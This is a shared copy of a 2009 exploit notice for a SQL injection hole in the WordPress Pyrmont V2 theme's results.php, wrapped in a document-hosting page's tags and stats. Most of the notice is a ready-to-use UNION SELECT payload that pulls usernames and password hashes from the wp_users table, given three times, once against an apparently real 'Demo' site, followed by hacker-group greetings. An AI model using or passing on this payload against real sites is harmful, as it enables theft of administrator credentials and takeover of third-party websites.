WordPress and Pyrmont V2. SQL Injection Vulnerability

Report as inappropriate Your report has been received

Shared by: h3m4n

Tags

rss feed, Free WordPress Themes, SQL Injection, Last Week, Mole Man, Patti Simmons, Site Management, Star Wars, Belmont Avenue, The Mole

Stats

views:: 40
posted:: 5/23/2010
language:: English
pages:: 1

Public Domain

Document Sample

							                           WordPress and Pyrmont V2. SQL Injection Vulnerability                                  Page 1/1
  1    #############################################################
  2    # WordPress and Pyrmont V2. SQL Injection Vulnerability
  3
  4    # Plugin Home: http://wordpress.org/extend/themes/pyrmont−v2
  5
  6    # Author: Gamoscu
  7
  8    # Site: www.1923turk.biz
  9
  10   #   Site: http://gamoscu.wordpress.com/
  11
  12   ##############################################################
  13
  14
  15
  16
  17   # Exploit:
  18   http://server/path/results.php?id=−9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13
       ,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
  19
  20              −9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2
       1,22,23,24+from+wp_users
  21
  22
  23   # Demo: http://cc.cc.moose.cc/maps/results.php?id=−9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7
       ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
  24
  25   ##############################################################
  26   # Greetz: Manas58 Baybora Delibey Tiamo Psiko
  27   ##############################################################
  28
  29
  30   Vatan Lafla Deðil Eylemle Sevilir




Gamoscu                                                                                                            12/18/2009